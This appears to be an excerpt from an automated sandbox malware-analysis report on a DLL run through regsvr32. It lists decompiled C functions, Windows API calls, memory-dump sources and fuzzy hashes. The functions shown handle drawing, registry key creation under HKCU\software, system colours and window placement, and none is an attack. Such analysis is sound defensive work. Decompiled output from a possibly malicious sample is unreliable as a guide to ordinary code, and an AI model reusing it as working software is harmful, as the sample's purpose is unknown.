0x1000f316

APIs

__EH_prolog3.LIBCMT ref: 1000F239

Part of subcall function 1001FDD8: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 1001FE1E
Part of subcall function 1001FDD8: CreatePatternBrush.GDI32(00000000), ref: 1001FE2B
Part of subcall function 1001FDD8: DeleteObject.GDI32(00000000), ref: 1001FE37

GetClientRect.USER32 ref: 1000F258
CreateRectRgnIndirect.GDI32(?), ref: 1000F271
GetDC.USER32(?), ref: 1000F283

Part of subcall function 1000C878: SelectClipRgn.GDI32(?,00000000), ref: 1000C89A
Part of subcall function 1000C878: SelectClipRgn.GDI32(?,00000004), ref: 1000C8B0

SendMessageA.USER32 ref: 1000F2AB

Part of subcall function 1000D13A: SelectObject.GDI32(?,00000000), ref: 1000D15C
Part of subcall function 1000D13A: SelectObject.GDI32(?,00000004), ref: 1000D172

PatBlt.GDI32(?,?,00000002,?,00000002,005A0049), ref: 1000F2E4
ReleaseDC.USER32(00000002,?), ref: 1000F2F8

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Select$CreateObject$ClipRect$BitmapBrushClientDeleteH_prolog3IndirectMessagePatternReleaseSend
String ID:
API String ID: 330565451-0
Opcode ID: 6186e9cc5a34a70b238502e19c0a2f34d54109da1cebe8bcd7e3b9df80bdff20
Instruction ID: ae825c2a38aadfa6ad2d5e23964ba6a6f6cc26f5f9c6a76fa10b4d73fef854a5
Opcode Fuzzy Hash: 6186e9cc5a34a70b238502e19c0a2f34d54109da1cebe8bcd7e3b9df80bdff20
Instruction Fuzzy Hash: 35212876900209EFDB01DBE4CE899EEBBB9FF48311B504258F146B21A0DB35AA10DB61

Uniqueness

Uniqueness Score: -1.00%

Function 10025EBB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10025EBB(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x10025ed6
0x10025edd
0x10025ee0
0x10025ee3
0x10025ee6
0x10025ef1
0x10025f28
0x10025f28
0x10025f33
0x10025f38
0x10025f38
0x10025f3d
0x10025f42
0x10025f42
0x10025f4b

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10025EE9
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F0C
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F28
RegCloseKey.ADVAPI32(?), ref: 10025F38
RegCloseKey.ADVAPI32(?), ref: 10025F42

Strings

software, xrefs: 10025ED1

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: a693620a9bdadc2d65233cbb8c755513046fcc4be62f62047e902ce2899f5840
Instruction ID: 42a707912d468ef30717d4f9f71364dcb2c1a33e5db109ec3b3fe5a363bbd037
Opcode Fuzzy Hash: a693620a9bdadc2d65233cbb8c755513046fcc4be62f62047e902ce2899f5840
Instruction Fuzzy Hash: D011B376900159BBDB11DB9ADD88CDFFFBCEF85745F1040AAB505A2121D6719A00DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10011DDB Relevance: 10.6, APIs: 7, Instructions: 60COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 10011DE7
GetWindowRect.USER32 ref: 10011E02
ScreenToClient.USER32(?,?), ref: 10011E15
ScreenToClient.USER32(?,?), ref: 10011E1E
EqualRect.USER32 ref: 10011E28
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10011E50
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10011E5A

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: c15a09ac07a48be0984b4a1291725d30e8c33f56f84e94449a3ba1b09cd1a87a
Instruction ID: 653b9982ac67d4bb700100f7ae05e2449e18e935689f0f94f15c853775d568fb
Opcode Fuzzy Hash: c15a09ac07a48be0984b4a1291725d30e8c33f56f84e94449a3ba1b09cd1a87a
Instruction Fuzzy Hash: 2011E67650021AEFEB009FA5CD84EEBBBBDEB89750B14841AED1696254D730E950CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002128F Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002128F(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x10021299
0x1002129f
0x100212a6
0x100212ad
0x100212b4
0x100212c1
0x100212c8
0x100212cb
0x100212ce
0x100212d2

APIs

GetSysColor.USER32 ref: 1002129B
GetSysColor.USER32 ref: 100212A2
GetSysColor.USER32 ref: 100212A9
GetSysColor.USER32 ref: 100212B0
GetSysColor.USER32 ref: 100212B7
GetSysColorBrush.USER32 ref: 100212C4
GetSysColorBrush.USER32 ref: 100212CB

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 8e77d5a660d64319e0ea3c320286592cf55ccb3bfd1d15ac1e67bc420ebbae40
Instruction ID: 0cc9ecc0ec31c172d87fef68e107198179d5a768bc50f180919af15bb17b9774
Opcode Fuzzy Hash: 8e77d5a660d64319e0ea3c320286592cf55ccb3bfd1d15ac1e67bc420ebbae40
Instruction Fuzzy Hash: 76F0FE719407445BE730BF724D49B47BAD1FFC4710F16092EE2818B990D6B5E0419F40

Uniqueness

Uniqueness Score: -1.00%

Function 10032245 Relevance: 9.4, APIs: 6, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10032245(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t163;
				signed short _t178;
				signed int _t184;
				signed short _t185;
				intOrPtr* _t187;
				void* _t189;
				signed short _t198;
				signed short _t200;
				signed int _t203;
				signed short _t206;
				signed short _t213;
				signed short _t215;
				signed short _t224;
				long long* _t231;
				intOrPtr* _t235;
				void* _t237;
				void* _t243;
				void* _t246;
				intOrPtr* _t248;
				void* _t254;
				void* _t257;
				signed int _t260;
				signed short _t261;
				signed short _t262;
				signed short _t266;
				signed short _t270;
				intOrPtr* _t271;
				void* _t281;
				signed short _t295;
				void* _t339;
				void* _t341;
				signed short _t343;
				void* _t344;
				intOrPtr* _t345;
				signed int _t346;
				void* _t348;
				intOrPtr _t352;
				signed long long _t358;

				_t342 = __esi;
				_t337 = __edx;
				_t282 = __ecx;
				_t346 = _t348 - 0x64;
				_t163 =  *0x100b9e70; // 0x6fb3f782
				 *(_t346 + 0x68) = _t163 ^ _t346;
				_push(0xcc);
				E1004764D(0x100908cd, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t346 + 0x4c)) =  *((intOrPtr*)(_t346 + 0x74));
				_t339 = __ecx;
				 *(_t346 + 0x30) = 0;
				_t352 =  *((intOrPtr*)(__ecx + 0x48));
				_t353 = _t352 == 0;
				if(_t352 == 0) {
					L1:
					E1000A069(0, _t282, _t339, _t342, _t353);
				}
				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
					goto L1;
				}
				E100235FF(_t346 + 0x3c);
				_t343 = 3;
				 *((intOrPtr*)(_t346 - 4)) = 0;
				 *(_t346 + 0x50) = _t343;
				E1002FC83(0,  *((intOrPtr*)(_t339 + 0x54)), _t346,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
				if( *(_t346 + 0x50) != _t343) {
					_t340 =  *((intOrPtr*)(_t339 + 0x54));
					_t178 = E1002DAF2( *((intOrPtr*)(_t339 + 0x54)), __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
					__eflags = _t178;
					if(_t178 == 0) {
						goto L4;
					} else {
						_t184 =  *(_t346 + 0x50) & 0x0000ffff;
						_t345 = __imp__#9;
						__eflags = _t184 - 0x81;
						if(__eflags > 0) {
							_t185 = _t184 - 0x82;
							__eflags = _t185;
							if(__eflags == 0) {
								goto L50;
							} else {
								_t198 = _t185 - 1;
								__eflags = _t198;
								if(__eflags == 0) {
									_t200 = E1002F8B0(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
									__eflags = _t200;
									if(_t200 != 0) {
										__eflags =  *(_t346 + 0x55);
										asm("fild qword [ebp+0x57]");
										if( *(_t346 + 0x55) > 0) {
											do {
												_t139 = _t346 + 0x55;
												 *_t139 =  *(_t346 + 0x55) - 1;
												__eflags =  *_t139;
												_t358 = _t358 /  *0x10099e60;
											} while ( *_t139 != 0);
										}
										__eflags =  *(_t346 + 0x56);
										if( *(_t346 + 0x56) == 0) {
											asm("fchs");
										}
										 *(_t346 - 0x14) = _t358;
										 *(_t346 - 0x1c) = 5;
										 *((char*)(_t346 - 4)) = 0xe;
										E100235DF(_t346 - 0x1c, _t346 + 0x3c, _t346 - 0x1c);
										_t203 = _t346 - 0x1c;
										goto L30;
									}
								} else {
									_t206 = _t198;
									__eflags = _t206;
									if(__eflags == 0) {
										__eflags = E1002F8DA(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
										if(__eflags != 0) {
											asm("fldz");
											 *(_t346 + 0x58) = _t358;
											_t337 =  *(_t346 + 0x34);
											 *((intOrPtr*)(_t346 + 0x60)) = 0;
											E10023C56(_t346 + 0x58, _t340, __eflags,  *(_t346 + 0x34),  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff, 0, 0, 0);
											 *_t346 = 7;
											 *(_t346 + 8) =  *(_t346 + 0x58);
											 *((char*)(_t346 - 4)) = 0xf;
											E100235DF(_t346, _t346 + 0x3c, _t346);
											_t203 = _t346;
											goto L30;
										}
									} else {
										_t213 = _t206 - 1;
										__eflags = _t213;
										if(__eflags == 0) {
											_t215 = E1002F90F(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
											__eflags = _t215;
											if(_t215 != 0) {
												asm("fldz");
												 *(_t346 + 0x58) = _t358;
												 *((intOrPtr*)(_t346 + 0x60)) = 0;
												E1002D958( *(_t346 + 0x34) & 0x0000ffff,  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff);
												 *(_t346 - 0x4c) = 7;
												 *(_t346 - 0x44) =  *(_t346 + 0x58);
												 *((char*)(_t346 - 4)) = 0x10;
												E100235DF(_t346 - 0x4c, _t346 + 0x3c, _t346 - 0x4c);
												_t203 = _t346 - 0x4c;
												goto L30;
											}
										} else {
											__eflags = _t213 - 1;
											if(__eflags == 0) {
												_t224 = E1002F944(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
												__eflags = _t224;
												if(_t224 != 0) {
													_t231 = E1002FBC6(_t346 - 0xd8,  *((short*)(_t346 + 0x54)),  *(_t346 + 0x56) & 0x0000ffff,  *(_t346 + 0x58) & 0x0000ffff,  *(_t346 + 0x5a) & 0x0000ffff,  *(_t346 + 0x5c) & 0x0000ffff,  *(_t346 + 0x5e) & 0x0000ffff);
													 *(_t346 - 0x3c) = 7;
													 *((long long*)(_t346 - 0x34)) =  *_t231;
													 *((char*)(_t346 - 4)) = 0x11;
													E100235DF(_t346 - 0x3c, _t346 + 0x3c, _t346 - 0x3c);
													_t203 = _t346 - 0x3c;
													goto L30;
												}
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t235 = E1000B543(0, _t346 + 0x50, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 2;
								_t237 = E10025968(_t346 - 0xbc, _t337, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 3;
								E100235DF(_t237, _t346 + 0x3c, _t237);
								 *_t345(_t346 - 0xbc,  *_t235, 8, E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
								_t295 =  *(_t346 + 0x50);
								goto L51;
							} else {
								__eflags = _t184 - 8;
								if(__eflags > 0) {
									__eflags = _t184 - 0xb;
									if(__eflags == 0) {
										_t243 = E10023391(_t346 - 0x9c,  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 0xb);
										 *((char*)(_t346 - 4)) = 0xb;
										E100235DF(_t243, _t346 + 0x3c, _t243);
										_t203 = _t346 - 0x9c;
										goto L30;
									} else {
										__eflags = _t184 - 0xc;
										if(__eflags == 0) {
											_t246 = E10023D77(_t346 - 0x8c, E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
											 *((char*)(_t346 - 4)) = 1;
											E100235DF(_t246, _t346 + 0x3c, _t246);
											_t203 = _t346 - 0x8c;
											goto L30;
										} else {
											__eflags = _t184 - 0xf;
											if(_t184 > 0xf) {
												__eflags = _t184 - 0x11;
												if(__eflags <= 0) {
													_t248 = E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
													 *(_t346 - 0x5c) = 0x11;
													 *((char*)(_t346 - 0x54)) =  *_t248;
													 *((char*)(_t346 - 4)) = 6;
													E100235DF(_t346 - 0x5c, _t346 + 0x3c, _t346 - 0x5c);
													_t203 = _t346 - 0x5c;
													goto L30;
												} else {
													__eflags = _t184 - 0x12;
													if(__eflags == 0) {
														goto L27;
													} else {
														__eflags = _t184 - 0x13;
														if(__eflags == 0) {
															goto L26;
														}
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L50:
										_t187 = E1000B053(0, _t346 + 0x30, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 4;
										_t189 = E10025968(_t346 - 0xcc, _t337, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 5;
										E100235DF(_t189, _t346 + 0x3c, _t189);
										 *_t345(_t346 - 0xcc,  *_t187, 8, E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
										_t295 =  *(_t346 + 0x30);
										L51:
										__eflags = _t295 + 0xfffffff0;
										 *((char*)(_t346 - 4)) = 0;
										L100013E3(_t295 + 0xfffffff0, _t337);
									} else {
										_t260 = _t184;
										__eflags = _t260;
										if(__eflags == 0) {
											L27:
											_t254 = E10023391(_t346 - 0xac,  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 2);
											 *((char*)(_t346 - 4)) = 7;
											E100235DF(_t254, _t346 + 0x3c, _t254);
											_t203 = _t346 - 0xac;
											goto L30;
										} else {
											_t261 = _t260 - 1;
											__eflags = _t261;
											if(__eflags == 0) {
												L26:
												_t257 = E100233B8(_t346 - 0x7c,  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))), 3);
												 *((char*)(_t346 - 4)) = 8;
												E100235DF(_t257, _t346 + 0x3c, _t257);
												_t203 = _t346 - 0x7c;
												goto L30;
											} else {
												_t262 = _t261 - 1;
												__eflags = _t262;
												if(__eflags == 0) {
													 *(_t346 + 0x50) =  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
													 *(_t346 + 0x10) = 4;
													 *(_t346 + 0x18) =  *(_t346 + 0x50);
													 *((char*)(_t346 - 4)) = 9;
													E100235DF(_t346 + 0x10, _t346 + 0x3c, _t346 + 0x10);
													_t203 = _t346 + 0x10;
													goto L30;
												} else {
													_t266 = _t262 - 1;
													__eflags = _t266;
													if(__eflags == 0) {
														 *(_t346 - 0x24) =  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
														 *(_t346 - 0x2c) = 5;
														 *((char*)(_t346 - 4)) = 0xa;
														E100235DF(_t346 - 0x2c, _t346 + 0x3c, _t346 - 0x2c);
														_t203 = _t346 - 0x2c;
														goto L30;
													} else {
														_t270 = _t266 - 1;
														__eflags = _t270;
														if(__eflags == 0) {
															_t271 = E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
															 *(_t346 + 0x20) = 6;
															 *((intOrPtr*)(_t346 + 0x28)) =  *_t271;
															 *((intOrPtr*)(_t346 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
															 *((char*)(_t346 - 4)) = 0xd;
															E100235DF(_t346 + 0x20, _t346 + 0x3c, _t346 + 0x20);
															_t203 = _t346 + 0x20;
															goto L30;
														} else {
															__eflags = _t270 - 1;
															if(__eflags == 0) {
																 *(_t346 - 0x64) =  *(E1002DB23(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
																 *(_t346 - 0x6c) = 7;
																 *((char*)(_t346 - 4)) = 0xc;
																E100235DF(_t346 - 0x6c, _t346 + 0x3c, _t346 - 0x6c);
																_t203 = _t346 - 0x6c;
																L30:
																 *((char*)(_t346 - 4)) = 0;
																 *_t345(_t203);
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						E10023D97( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
						 *_t345(_t346 + 0x3c);
					}
				} else {
					L4:
					E10023D97( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
					__imp__#9(_t346 + 0x3c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t346 - 0xc));
				_pop(_t341);
				_pop(_t344);
				_pop(_t281);
				return E1004763E( *((intOrPtr*)(_t346 + 0x4c)), _t281,  *(_t346 + 0x68) ^ _t346, _t337, _t341, _t344);
			}

0x10032245
0x10032245
0x10032245
0x10032249
0x1003224d
0x10032254
0x10032257
0x10032261
0x1003226b
0x10032270
0x10032272
0x10032275
0x1003227b
0x1003227d
0x1003227f
0x1003227f
0x1003227f
0x1003228e
0x00000000
0x00000000
0x10032294
0x1003229e
0x100322a6
0x100322a9
0x100322ac
0x100322b4
0x100322d1
0x100322dd
0x100322e2
0x100322e4
0x00000000
0x100322e6
0x100322e6
0x100322ea
0x100322f5
0x100322f7
0x10032551
0x10032551
0x10032556
0x00000000
0x1003255c
0x1003255c
0x1003255c
0x1003255d
0x10032695
0x1003269a
0x1003269c
0x100326a2
0x100326a5
0x100326a8
0x100326aa
0x100326aa
0x100326aa
0x100326aa
0x100326ad
0x100326ad
0x100326aa
0x100326b5
0x100326b8
0x100326ba
0x100326ba
0x100326bc
0x100326bf
0x100326cc
0x100326d0
0x100326d5
0x00000000
0x100326d5
0x10032563
0x10032564
0x10032564
0x10032565
0x1003263e
0x10032640
0x1003264a
0x10032650
0x10032653
0x10032660
0x10032663
0x10032668
0x10032671
0x1003267b
0x1003267f
0x10032684
0x00000000
0x10032684
0x1003256b
0x1003256b
0x1003256b
0x1003256c
0x100325e0
0x100325e5
0x100325e7
0x100325f1
0x100325f4
0x10032604
0x10032607
0x1003260c
0x10032615
0x1003261f
0x10032623
0x10032628
0x00000000
0x10032628
0x1003256e
0x1003256e
0x1003256f
0x1003257e
0x10032583
0x10032585
0x100325af
0x100325b4
0x100325bc
0x100325c6
0x100325ca
0x100325cf
0x00000000
0x100325cf
0x10032585
0x1003256f
0x1003256c
0x10032565
0x1003255d
0x100322fd
0x100322fd
0x1003251a
0x1003252a
0x1003252e
0x10032537
0x1003253b
0x10032547
0x10032549
0x00000000
0x10032303
0x10032303
0x10032306
0x100323f5
0x100323f8
0x100324f2
0x100324fb
0x100324ff
0x10032504
0x00000000
0x100323fe
0x100323fe
0x10032401
0x100324b9
0x100324c2
0x100324c6
0x100324cb
0x00000000
0x10032407
0x10032407
0x1003240a
0x10032410
0x10032413
0x10032483
0x1003248a
0x10032490
0x1003249a
0x1003249e
0x100324a3
0x00000000
0x10032415
0x10032415
0x10032418
0x00000000
0x1003241a
0x1003241a
0x1003241d
0x00000000
0x00000000
0x1003241d
0x10032418
0x10032413
0x1003240a
0x10032401
0x1003230c
0x1003230c
0x100326dd
0x100326eb
0x100326fb
0x100326ff
0x10032708
0x1003270c
0x10032718
0x1003271a
0x1003271d
0x1003271d
0x10032720
0x10032723
0x10032312
0x10032313
0x10032313
0x10032314
0x1003244e
0x10032464
0x1003246d
0x10032471
0x10032476
0x00000000
0x1003231a
0x1003231a
0x1003231a
0x1003231b
0x10032423
0x10032434
0x1003243d
0x10032441
0x10032446
0x00000000
0x10032321
0x10032321
0x10032321
0x10032322
0x100323ce
0x100323d1
0x100323da
0x100323e4
0x100323e8
0x100323ed
0x00000000
0x10032328
0x10032328
0x10032328
0x10032329
0x100323a1
0x100323a4
0x100323b1
0x100323b5
0x100323ba
0x00000000
0x1003232b
0x1003232b
0x1003232b
0x1003232c
0x10032367
0x10032371
0x10032377
0x1003237a
0x10032384
0x10032388
0x1003238d
0x00000000
0x1003232e
0x1003232e
0x1003232f
0x10032341
0x10032344
0x10032351
0x10032355
0x1003235a
0x100324d1
0x100324d2
0x100324d5
0x100324d5
0x1003232f
0x1003232c
0x10032329
0x10032322
0x1003231b
0x10032314
0x1003230c
0x10032306
0x100322fd
0x1003272f
0x10032738
0x10032738
0x100322b6
0x100322b6
0x100322bd
0x100322c6
0x100322c6
0x10032740
0x10032748
0x10032749
0x1003274a
0x10032759

APIs

__EH_prolog3.LIBCMT ref: 10032261
VariantClear.OLEAUT32(?), ref: 100322C6

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

VariantClear.OLEAUT32(?), ref: 100324D5
VariantClear.OLEAUT32(?), ref: 10032547
VariantClear.OLEAUT32(?), ref: 10032738

Part of subcall function 100235DF: VariantCopy.OLEAUT32(00000000,00000000), ref: 100235ED

Part of subcall function 1000B543: __EH_prolog3.LIBCMT ref: 1000B54A

Part of subcall function 10025968: __EH_prolog3.LIBCMT ref: 10025972
Part of subcall function 10025968: lstrlenA.KERNEL32(?,?,?,00000224), ref: 10025991
Part of subcall function 10025968: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 10025999

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Variant$ClearH_prolog3$AllocByteCopyException@8StringThrowlstrlen
String ID:
API String ID: 1021156189-0
Opcode ID: 41d82c729fe2f8260028a4ca9dc4131b6792d18636b98becd0ca89b7d9f04e1c
Instruction ID: a0bcb12857ba3903d996966c8cd61b66d77702176a5ef2efd29989c3a65c1587
Opcode Fuzzy Hash: 41d82c729fe2f8260028a4ca9dc4131b6792d18636b98becd0ca89b7d9f04e1c
Instruction Fuzzy Hash: 0CF17C3590024CEEDF06DFA0D890AED7BB9FF08341F90805AFC5597252DB74AA88DB61

Uniqueness

Uniqueness Score: -1.00%

Function 10044419 Relevance: 9.3, APIs: 6, Instructions: 326COMMON

Download Yara Rule

APIs

